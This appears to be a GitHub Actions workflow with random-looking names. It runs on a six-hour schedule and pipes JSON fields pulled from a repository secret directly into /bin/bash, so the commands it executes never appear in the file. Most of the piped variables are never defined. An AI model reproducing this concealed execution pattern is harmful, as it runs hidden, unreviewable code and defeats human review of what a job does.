name: huaizhongjiechu

on:
  workflow_dispatch:
  schedule:
    - cron: '11 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huaizhongjiechu
        env:
          utumy5: ${{ secrets.utumy5 }}
        run: |
          echo $utumy5 | jq -r .l084 | /bin/bash
          echo $czu9 | jq -r .rd729 | /bin/bash
          echo $t56484 | jq -r .xg52606 | /bin/bash
          echo $v57752 | jq -r .xdmd808 | /bin/bash
          echo $nfoh4 | jq -r .syver87 | /bin/bash
          echo $h974 | jq -r .nsk44 | /bin/bash
          echo $v8569 | jq -r .dcycn95 | /bin/bash
          echo $fytb97 | jq -r .fefyb2 | /bin/bash
          echo $sjupk35 | jq -r .kugkk55 | /bin/bash
          echo $lpw018 | jq -r .i66483 | /bin/bash
          echo $oojib74785 | jq -r .qnsr4570 | /bin/bash

